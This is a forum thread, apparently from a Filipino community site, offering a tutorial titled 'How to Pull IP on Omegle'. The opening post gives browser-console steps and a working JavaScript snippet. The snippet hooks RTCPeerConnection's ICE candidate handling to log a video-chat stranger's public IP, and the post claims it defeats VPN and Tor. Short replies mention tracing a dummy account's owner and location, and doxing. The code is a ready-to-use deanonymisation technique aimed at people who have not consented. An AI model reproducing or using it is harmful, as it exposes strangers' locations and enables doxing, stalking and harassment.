👨‍🏫 Tutorial How to Pull IP on Omegle

D

Deleted member 2294691

Works even if they are on Tor or using VPN due to webRTC.

1. Open web console.
2. Paste this code and run it.
Code:
window.oRTCPeerConnection = window.oRTCPeerConnection || window.RTCPeerConnection

window.RTCPeerConnection = function(...args) {
    const pc = new window.oRTCPeerConnection(...args)

    pc.oaddIceCandidate = pc.addIceCandidate

    pc.addIceCandidate = function(iceCandidate, ...rest) {
        const fields = iceCandidate.candidate.split(' ')

        if (fields[7] === 'srflx') {
            console.log('IP Address:', fields[4])
        }
        return pc.oaddIceCandidate(iceCandidate, ...rest)

    }

    return pc
}
 
kase may kakilala akong random guy alam nya talaga kung sino may ari nung dummy account at location


parang 50s ganon siguro
Well if that account already got doxed, leaked and in the countries that are serving the 14-Eyes (The platform) It won't be that hard. This is also one of the reason I don't like platforms that doesn't respect users privacy (Not privacy-focused).
 

About this Thread

  • 18
    Replies
  • 2K
    Views
  • 11
    Participants
Last reply from:
JaysonRare

Online now

Members online
980
Guests online
4,305
Total visitors
5,285

Forum statistics

Threads
2,313,146
Posts
29,171,985
Members
1,184,613
Latest member
Salsalito Bayagbag
Back
Top